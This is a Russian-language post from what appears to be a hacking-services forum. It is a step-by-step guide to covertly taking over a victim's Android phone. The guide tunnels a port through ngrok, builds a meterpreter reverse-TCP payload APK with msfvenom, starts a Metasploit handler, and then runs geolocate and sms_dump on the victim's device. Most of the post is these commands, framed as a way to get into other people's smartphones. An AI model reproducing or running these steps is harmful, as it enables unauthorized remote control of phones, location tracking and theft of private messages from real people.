Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Recommended Posts

 Привет, хакеры, в данной статье поговорим о ngrok и metasploit и способы взлома телефона и получения удаленного доступа к смартфону, используя эти программы.

Первым делом переходим на официальный сайт ngrok и создаем аккаунт. Скачивает и устанавливаем инструмент. Ссылка - https://ngrok.com/download

Перемещаем иконку запуска на рабочий стол для удобства, запускаем и прописываем следующую строчку: ngrok-stable-linux-amd64.zip

 

После прописываем: ./ngrok authtoken

В терминале пишем: ./ngrok tcp 4444

Не забывайте, если вы имеете белый адрес, то данные пункты можно пропустить и даже не использовать Ngrok.

Следующим этапом является полноценное создание Payload’а для смартфона. Чтобы создать его будем использовать msfvenom, поэтому используя новую консоль прописываем в ней:

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk

Если ngrok вы не использовали, то поле LHOST прописываешь собственный ип-адрес, а в LPORT прописываем 4444.

Отлично, payload подготовлен, теперь необходимо передать его нашей жертве.

Далее необходимо узнать ip-адрес, используя Kali Linux пишем – “ipconfig”, если у вас установлен Arch, то прописываем “ip a”.

Теперь атаку будет производить metasploit, если используете кали, то установке не требуется, он предустановлен.

Для запуска прописываем в консоле: msfconsole.

И пишем:

msfconsole

use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST localhost

set LPORT 4444

exploit

Когда жертва откроет payload мы сразу же увидим открытую сессию.

С этого момента получаем удаленный доступ к телефону жертвы.

Для нахождения местоположения необходимо написать: geolocate

Также можно скопировать все смс-сообщения при помощи команды: sms_dump

Используя подобную незамысловатую схему, вы можете легко получать доступ к чужим смартфонами и работать с инструментами, чтобы использовать полученную информацию.

Я никого ни к чему не призываю, статья написана в ознакомительных целях!

Link to comment
Share on other sites

  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Member Statistics

    6,647
    Total Members
    30,834
    Most Online
    Dizz
    Newest Member
    Dizz
    Joined
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.